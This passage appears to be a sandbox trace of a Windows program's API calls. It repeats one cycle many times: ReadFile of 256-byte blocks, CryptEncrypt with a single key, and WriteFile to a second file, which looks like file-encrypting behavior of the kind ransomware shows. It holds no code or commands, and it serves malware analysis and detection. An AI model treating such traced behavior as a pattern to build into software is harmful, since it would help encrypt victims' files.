lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.303] GetLastError () returned 0x0 [0168.303] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.303] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.303] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.304] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.304] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.304] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.304] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.304] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.304] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.304] GetLastError () returned 0x0 [0168.304] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.304] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.305] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.305] GetLastError () returned 0x0 [0168.305] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.305] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.305] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.305] GetLastError () returned 0x0 [0168.305] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.305] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.305] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.305] GetLastError () returned 0x0 [0168.305] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.305] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.305] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.305] GetLastError () returned 0x0 [0168.305] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.305] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.305] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.305] GetLastError () returned 0x0 [0168.305] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.305] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.305] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.305] GetLastError () returned 0x0 [0168.305] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.305] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.306] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.306] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.306] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.306] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.306] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.306] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.306] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.306] GetLastError () returned 0x0 [0168.306] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.307] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.307] GetLastError () returned 0x0 [0168.307] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.307] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.307] GetLastError () returned 0x0 [0168.307] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.307] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.307] GetLastError () returned 0x0 [0168.307] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.307] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.307] GetLastError () returned 0x0 [0168.307] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.307] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.307] GetLastError () returned 0x0 [0168.307] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.307] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.307] GetLastError () returned 0x0 [0168.307] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.307] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.308] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.308] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.308] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.308] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.308] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.308] GetLastError () returned 0x0 [0168.308] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.308] ReadFile (in: hFile=0x15b0, lpBuffer=0x609d48, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x609d48*, lpNumberOfBytesRead=0x2d7e640*=0x100, 